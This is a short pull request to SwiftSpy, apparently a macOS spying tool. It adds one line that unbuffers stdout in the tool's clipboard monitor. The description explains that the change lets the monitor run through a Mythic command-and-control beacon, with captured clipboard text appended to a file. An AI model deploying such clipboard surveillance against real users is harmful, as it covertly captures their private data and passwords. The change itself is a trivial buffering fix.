### PR TITLE
Set buffer to 0 for stdout in clipboard monitor

### DIFF
--- a/SwiftSpy/main.swift
+++ b/SwiftSpy/main.swift
@@ -136,6 +136,7 @@ class SwiftSpy
     
     func ClipboardMonitor()
     {
+        setbuf(__stdoutp, nil)
         let pasteboard = NSPasteboard.general
         var changeCount = NSPasteboard.general.changeCount
         while true {


### PR DESCRIPTION
Set the stdout buffer to 0 so that text is constantly printed if piping the output to tee or a file.  This allows to run through a mythic beacon with:

shell /path/to/swiftspy -clipboard >> output.txt

Got the code from this stackoverflow post: https://stackoverflow.com/a/28180452